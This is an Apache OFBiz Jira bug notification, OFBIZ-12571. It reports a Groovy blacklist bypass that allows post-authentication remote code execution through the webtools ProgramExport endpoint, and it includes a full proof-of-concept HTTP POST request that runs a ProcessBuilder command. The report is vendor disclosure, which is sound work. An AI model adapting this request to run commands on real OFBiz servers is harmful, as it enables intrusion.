You are viewing a plain text version of this content. The canonical link for it is here.

Posted to notifications@ofbiz.apache.org by "Y4er (Jira)" <ji...@apache.org> on 2022/02/10 09:52:00 UTC

[jira] [Created] (OFBIZ-12571) groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport

Y4er created OFBIZ-12571:
----------------------------

             Summary: groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
                 Key: OFBIZ-12571
                 URL: https://issues.apache.org/jira/browse/OFBIZ-12571
             Project: OFBiz
          Issue Type: Bug
          Components: framework/webtools
    Affects Versions: 18.12.05
         Environment: ofbiz 18.12.05
            Reporter: Y4er
         Attachments: image-2022-02-10-17-50-58-914.png

groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport

 
{code:java}
POST /webtools/control/ProgramExport HTTP/1.1
Host: 192.168.1.178:8443
Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; webtools.securedLoginId=admin; OFBiz.Visitor=10302
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 68

groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 {code}
!image-2022-02-10-17-50-58-914.png!



--
This message was sent by Atlassian Jira
(v8.20.1#820001)